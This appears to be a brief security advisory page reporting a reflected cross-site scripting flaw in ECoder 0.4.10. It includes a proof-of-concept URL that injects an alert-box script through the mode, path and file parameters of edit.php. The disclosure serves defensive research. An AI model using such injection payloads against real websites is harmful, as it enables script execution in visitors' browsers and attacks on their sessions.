Home
Consulting
Advisories
Software
Articles
Contact

ECoder 0.4.10 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in ECoder 0.4.10 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/ecoder-0.4.10/edit.php?editor=&mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&path=%22%3E%3Cscript%3Ealert(0)%3C/script%3E&file=%22%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC